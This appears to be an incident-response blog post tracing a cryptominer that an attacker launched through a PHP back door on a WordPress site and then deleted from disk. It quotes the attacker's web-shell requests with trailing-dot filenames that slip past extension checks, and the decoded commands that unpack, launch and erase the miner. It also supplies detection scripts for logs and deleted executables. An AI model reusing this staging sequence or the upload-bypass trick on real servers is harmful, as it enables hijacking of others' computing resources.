File-less Crypto-mining? kind of…

Not to overhype it, but everyone these days is excited about the idea of file-less malware and how it bypasses traditional anti-malware techniques. Last week I ran into a case in which the attacker evaded my usual methods for locating malicious crypto-coin miners (prior examples: one, two) by removing the file once it had achieved its objective, in this case mining on the compromised server.

We initially received a report of email not being processed on the server. After logging in, the first tech immediately identified a load issue and found the following in the running processes:

 ./virusscan --algo scrypt --url stratum+tcp://litecoinpool.org:3333 --userpass samerbbakkar.ext1:x

They killed the running process and passed on the rest of the investigation. I began to dig in and ran two of our traditional malware scanners, but got no hits. I ran my minerchk tool: again, no hits.

I dropped into the directory that the prior technician's notes from the initial investigation referred to. One look at it tells me someone has been testing what kinds of files they can upload to this site in order to compromise it; the trailing dots and bogus .docx suffixes on the .php names are the residue of probing the upload filter's extension check.

drwxr-xr-x 2 user user 4096 Jan 20 07:50 ./
drwxr-xr-x 12 user user 4096 Jan 4 09:39 ../
-rw-r--r-- 1 user user 39 Jan 8 14:04 _1.php.
-rw-r--r-- 1 user user 542 Jan 13 22:46 637161.php.
-rw-r--r-- 1 user user 542 Jan 13 22:45 764102.php.
-rw-r--r-- 1 user user 542 Jan 13 22:46 816293.php.
-rw-r--r-- 1 user user 10924 Jan 8 14:28 a.php.
-rw-r--r-- 1 user user 776 Jan 13 10:04 assig.php.
-rw-r--r-- 1 user user 78 Jan 10 06:13 b.php.
-rw-r--r-- 1 user user 78 Jan 10 09:55 b.php_1.
-rw-r--r-- 1 user user 66879 Jan 11 20:49 class.print.php
-rw-r--r-- 1 user user 66879 Jan 9 17:42 class.print.php.
-rw-r--r-- 1 user user 40 Jan 8 13:38 c.php.
-rw-r--r-- 1 user user 40 Jan 8 13:39 c.php_1.
-rw-r--r-- 1 user user 40 Jan 8 13:41 c.php_2.
-rw-r--r-- 1 user user 40 Jan 8 13:41 c.php_3.
-rw-r--r-- 1 user user 40 Jan 8 13:41 c.php_4.
-rw-r--r-- 1 user user 40 Jan 8 13:42 c.php_5.
-rw-r--r-- 1 user user 40 Jan 8 13:43 c.php_6.
-rw-r--r-- 1 user user 26 Jan 11 03:04 c.php_7.
-rw-r--r-- 1 user user 3179 Jan 9 09:19 error_log
-rw-r--r-- 1 user user 13 Jan 11 00:00 f.txt
-rw-r--r-- 1 user user 218 Jan 9 09:19 .htaccess
-rw-r--r-- 1 user user 17 Jan 10 12:02 info.php_1.docx
-rw-r--r-- 1 user user 17 Jan 9 12:06 info.php.docx
-rw-r--r-- 1 user user 9798 Jan 10 08:29 M.php.
-rw-r--r-- 1 user user 88 Jan 9 09:19 php.ini
-rw-r--r-- 1 user user 473 Jan 9 16:53 print.php.
-rw-r--r-- 1 user user 874 Jan 8 13:44 print.php_1.
-rw-r--r-- 1 user user 34 Jan 9 06:47 q.php.
-rw-r--r-- 1 user user 34 Jan 9 07:35 q.php_1.
-rw-r--r-- 1 user user 2215 Jan 11 16:27 RxR_1515705760.php.
-rw-r--r-- 1 user user 1493 Jan 12 10:00 shell1.php.
-rw-r--r-- 1 user user 39 Jan 8 06:29 shell.php.
-rw-r--r-- 1 user user 39 Jan 8 12:36 shell.php_1.
-rw-r--r-- 1 user user 39 Jan 11 15:41 shell.php_2.
-rw-r--r-- 1 user user 39 Jan 9 11:45 shell.php.docx
-rw-r--r-- 1 user user 114 Jan 9 08:26 some.php.
-rw-r--r-- 1 user user 114 Jan 9 08:26 some.php_1.
-rw-r--r-- 1 user user 114 Jan 9 08:37 some.php_2.
-rw-r--r-- 1 user user 114 Jan 9 08:37 some.php_3.
-rw-r--r-- 1 user user 114 Jan 9 08:39 some.php_4.
-rw-r--r-- 1 user user 114 Jan 9 08:39 some.php_5.
-rw-r--r-- 1 user user 114 Jan 11 08:17 some.php_6.
-rw-r--r-- 1 user user 114 Jan 11 08:17 some.php_7.
-rw-r--r-- 1 user user 114 Jan 11 08:18 some.php_8.
-rw-r--r-- 1 user user 114 Jan 11 08:18 some.php_9.
-rw-r--r-- 1 user user 721 Jan 8 23:36 weba12.php.

Still no miner binary or configuration to be found.

Among the files present I found two that were live back doors, so I disabled those and continued the investigation, running every variation I could think of to search for a file named “virusscan” or for the stratum+tcp string that nearly every miner uses in one form or another.

No luck. I wrote up my report to the system owner alerting them to the PHP back doors and the upload function being abused on the site.


About to log off the system, I ran a final check of running processes, and look what's back:

 37031 user 20 0 773m 7844 1200 S 795.0 0.1 159:58.73 ./virusscan --algo scrypt --url stratum+tcp://litecoinpool.org:3333 --userpass samerbbakkar.ext1:x 

So I reworked my investigation, thinking that somehow I must have missed something, but no: there was no file named virusscan anywhere on the system. The web server's access log is where I was finally able to confirm what was going on.

88.254.64.X - - [20/Jan/2018:09:21:03 -0500] "POST /wp-content/uploads/assignments/print.php. HTTP/1.1" 200 9 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50"
88.254.64.X - - [20/Jan/2018:09:21:04 -0500] "POST /wp-content/uploads/assignments/print.php. HTTP/1.1" 200 47 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:07 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=cGtpbGwgdmlydXNzY2FuOyB1bnppcCB2aXJ1c3NjYW4uemlw HTTP/1.1" 200 100 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:09 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=Y2htb2QgK3ggdmlydXNzY2Fu HTTP/1.1" 200 20 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:11 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=Li92aXJ1c3NjYW4gLS1hbGdvIHNjcnlwdCAtLXVybCBzdHJhdHVtK3RjcDovL2xpdGVjb2lucG9vbC5vcmc6MzMzMyAtLXVzZXJwYXNzIHNhbWVyYmJha2thci5leHQxOmFiY2RlZiAxPi9kZXYvbnVsbCAyPiYxICY= HTTP/1.1" 200 124 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:13 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=cm0gdmlydXMqOyBwcyBhdXggfCBncmVwIHZpcnVzc2Nhbg== HTTP/1.1" 200 394 "-" "curl/7.57.0"

First we see two POSTs to print.php., one of the two back doors identified earlier, followed by a series of GETs that pass a ?cmd= query parameter, which is not at allllllllllllllll suspicious. Note the trailing dot on the request target: it is the same filename trick seen throughout the upload directory, there to slip past a naive extension check, and the 200 responses with body sizes that vary per command confirm the server still executed it as PHP. Looking at the values after cmd=:

cGtpbGwgdmlydXNzY2FuOyB1bnppcCB2aXJ1c3NjYW4uemlw

Y2htb2QgK3ggdmlydXNzY2Fu

Li92aXJ1c3NjYW4gLS1hbGdvIHNjcnlwdCAtLXVybCBzdHJhdHVtK3RjcDovL2xpdGVjb2lucG9vbC5vcmc6MzMzMyAtLXVzZXJwYXNzIHNhbWVyYmJha2thci5leHQxOmFiY2RlZiAxPi9kZXYvbnVsbCAyPiYxICY=

cm0gdmlydXMqOyBwcyBhdXggfCBncmVwIHZpcnVzc2Nhbg==

Pretty obviously base64, the old standard of obfuscation 101. Decoded back to plain text:

pkill virusscan; unzip virusscan.zip

chmod +x virusscan

./virusscan --algo scrypt --url stratum+tcp://litecoinpool.org:3333 --userpass samerbbakkar.ext1:abcdef 1>/dev/null 2>&1 &

rm virus*; ps aux | grep virusscan

So the malicious actor pushed the miner archive up through the back door, then issued the commands in sequence: pkill any earlier instance (the one the first tech had already killed), unzip the archive, mark the binary executable, launch it detached with all output discarded, then delete everything matching virus* and confirm via ps that the miner is still running. The result looks like a process that came from nowhere, and it hides the miner's origin from anyone hunting for the file on disk.
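The same decoding, done as a small detection script rather than by hand, is an added example for this post and not the author's minerchk tool or any code from the original. It parses combined-format access log lines (the six lines quoted above, source IP masked as on the page), pulls out the ?cmd= parameter, base64-decodes it even when the padding has been stripped, and flags commands that carry miner-staging markers. The `MINER_MARKERS` list and the `cmd` parameter name are assumptions; other web shells use other parameter names.

```python
"""Pull ?cmd= web-shell commands out of an Apache/Nginx combined access log and decode them."""
import base64
import binascii
import re
from urllib.parse import unquote

# The six access-log lines quoted in the post (source IP already masked there).
ACCESS_LOG = """\
88.254.64.X - - [20/Jan/2018:09:21:03 -0500] "POST /wp-content/uploads/assignments/print.php. HTTP/1.1" 200 9 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50"
88.254.64.X - - [20/Jan/2018:09:21:04 -0500] "POST /wp-content/uploads/assignments/print.php. HTTP/1.1" 200 47 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:07 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=cGtpbGwgdmlydXNzY2FuOyB1bnppcCB2aXJ1c3NjYW4uemlw HTTP/1.1" 200 100 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:09 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=Y2htb2QgK3ggdmlydXNzY2Fu HTTP/1.1" 200 20 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:11 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=Li92aXJ1c3NjYW4gLS1hbGdvIHNjcnlwdCAtLXVybCBzdHJhdHVtK3RjcDovL2xpdGVjb2lucG9vbC5vcmc6MzMzMyAtLXVzZXJwYXNzIHNhbWVyYmJha2thci5leHQxOmFiY2RlZiAxPi9kZXYvbnVsbCAyPiYxICY= HTTP/1.1" 200 124 "-" "curl/7.57.0"
88.254.64.X - - [20/Jan/2018:09:21:13 -0500] "GET /wp-content/uploads/assignments/print.php.?cmd=cm0gdmlydXMqOyBwcyBhdXggfCBncmVwIHZpcnVzc2Nhbg== HTTP/1.1" 200 394 "-" "curl/7.57.0"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "[^"]*" "(?P<ua>[^"]*)"'
)

# Assumed markers: substrings that turn a decoded web-shell command into a miner-staging finding.
MINER_MARKERS = ("stratum+tcp://", "--userpass", "--algo", "chmod +x", "pkill", "rm virus")


def decode_base64_loose(blob):
    """Decode base64 even when the '=' padding was stripped; None if it is not base64 text."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def query_params(target):
    """Split the request target's query string without the '+' -> ' ' translation.

    urllib.parse.parse_qs would turn a literal '+' (a valid base64 character) into a
    space and corrupt the blob, so the query is split by hand and only %XX-unquoted.
    """
    if "?" not in target:
        return {}
    params = {}
    for pair in target.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")  # keeps trailing '==' padding in the value
        params[unquote(key)] = unquote(value)
    return params


def extract_shell_commands(log_text, param="cmd"):
    """Return one record per request whose query string carries the web-shell parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        params = query_params(m["target"])
        if param not in params:
            continue
        raw = params[param]
        decoded = decode_base64_loose(raw)
        command = decoded if decoded is not None else raw
        findings.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "path": m["target"].split("?", 1)[0],
            "user_agent": m["ua"],
            "command": command,
            "was_base64": decoded is not None,
            "miner_related": any(marker in command for marker in MINER_MARKERS),
        })
    return findings


def miner_staging_sequence(log_text):
    """Return just the decoded commands, in log order, that look like miner staging."""
    return [f["command"] for f in extract_shell_commands(log_text) if f["miner_related"]]


if __name__ == "__main__":
    for f in extract_shell_commands(ACCESS_LOG):
        flag = "MINER" if f["miner_related"] else "cmd  "
        print(f"{f['timestamp']}  {f['ip']:<14} {flag}  {f['command']}")
```

Run against a real log, the ordering of the decoded commands is what matters: a kill, an unpack, a chmod, a backgrounded launch and an rm within a few seconds from one IP is the whole staging sequence, and the path in the request line is the back door to remove.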

So while there is a file on the system, it exists only long enough to start the miner, and if you cannot locate the back door the miner will keep coming back. The binary is also not as gone as it looks: on Linux a running process keeps its unlinked executable alive, so `ls -l /proc/<pid>/exe` shows the original path suffixed with (deleted), `cp /proc/<pid>/exe /tmp/sample` recovers it for analysis, and `/proc/<pid>/cwd` points at the directory it was unpacked in. Grab that before killing the process, because once it exits the inode is freed.
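A sweep for exactly that condition, added here as an example and not part of the original post or the author's tooling: walk /proc, report every process whose exe link ends in " (deleted)", tag the ones whose command line looks like a miner, and copy the still-mapped binary out through the link. Because a live host may have no such process, the block also builds a constructed fake proc tree (pid 37031 and the command line are taken from the post; the file contents are placeholders) so the logic can be exercised offline. The `MINER_HINTS` list is an assumption.

```python
"""Find processes whose executable has been unlinked from disk and recover the binary."""
import os
import shutil
import tempfile

# Assumed hints: argument fragments common to pool-mining clients.
MINER_HINTS = ("stratum+tcp://", "stratum+ssl://", "--userpass", "--algo")
DELETED_SUFFIX = " (deleted)"  # what the kernel appends to /proc/<pid>/exe after an unlink


def read_cmdline(proc_dir):
    """Return argv from /proc/<pid>/cmdline (NUL-separated); empty list if unreadable."""
    try:
        with open(os.path.join(proc_dir, "cmdline"), "rb") as fh:
            return [a.decode("utf-8", "replace") for a in fh.read().split(b"\0") if a]
    except OSError:
        return []


def find_deleted_executables(proc_root="/proc"):
    """Return records for every process whose exe symlink points at a deleted file."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():  # skip self, sys, net, ...
            continue
        proc_dir = os.path.join(proc_root, entry)
        try:
            target = os.readlink(os.path.join(proc_dir, "exe"))
        except OSError:  # kernel threads, zombies, or processes we may not inspect
            continue
        if not target.endswith(DELETED_SUFFIX):
            continue
        cmdline = " ".join(read_cmdline(proc_dir))
        hits.append({
            "pid": int(entry),
            "exe": target[: -len(DELETED_SUFFIX)],
            "cmdline": cmdline,
            "miner_like": any(h in cmdline for h in MINER_HINTS),
            "exe_link": os.path.join(proc_dir, "exe"),
        })
    return sorted(hits, key=lambda h: h["pid"])


def recover_binary(exe_link, dest):
    """Copy the executable out via /proc/<pid>/exe; returns the number of bytes written.

    On a real host the kernel resolves the link to the open inode even though no path
    to it remains on the filesystem, which is why this works after rm.
    """
    shutil.copyfile(exe_link, dest)
    return os.path.getsize(dest)


def build_demo_proc(root):
    """Constructed fake /proc: one deleted-miner process and one benign one (not real data)."""
    # A real kernel appends the suffix itself; here a file with that name stands in for the
    # unlinked inode so that readlink() and copyfile() behave as they would on a live system.
    miner_bin = os.path.join(root, "virusscan" + DELETED_SUFFIX)
    with open(miner_bin, "wb") as fh:
        fh.write(b"\x7fELF" + b"\x00" * 60)  # placeholder for the miner ELF
    fake = os.path.join(root, "proc")
    miner = os.path.join(fake, "37031")
    os.makedirs(miner)
    os.symlink(miner_bin, os.path.join(miner, "exe"))
    argv = ["./virusscan", "--algo", "scrypt", "--url", "stratum+tcp://litecoinpool.org:3333",
            "--userpass", "samerbbakkar.ext1:x"]
    with open(os.path.join(miner, "cmdline"), "wb") as fh:
        fh.write(b"\0".join(a.encode() for a in argv) + b"\0")
    benign = os.path.join(fake, "1234")
    os.makedirs(benign)
    os.symlink("/usr/sbin/sshd", os.path.join(benign, "exe"))
    with open(os.path.join(benign, "cmdline"), "wb") as fh:
        fh.write(b"/usr/sbin/sshd\0-D\0")
    os.makedirs(os.path.join(fake, "self"))  # non-numeric entry that must be skipped
    return fake


def demo():
    """Scan the fake tree and recover its binary; returns (hits, recovered_size)."""
    with tempfile.TemporaryDirectory() as tmp:
        hits = find_deleted_executables(build_demo_proc(tmp))
        size = recover_binary(hits[0]["exe_link"], os.path.join(tmp, "recovered.bin")) if hits else 0
    return hits, size


if __name__ == "__main__":
    for h in find_deleted_executables():
        tag = "MINER?" if h["miner_like"] else "      "
        print(f"{h['pid']:>7} {tag} {h['exe']}  ::  {h['cmdline']}")
```

A deleted exe is not proof of malice on its own (a package upgrade that replaced a running daemon's binary looks the same), so the command-line tag is what separates "restart this service" from "copy this sample and pull the network connections before killing it".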

Have you seen this technique before? Have questions? Find me on Twitter: @laskow26.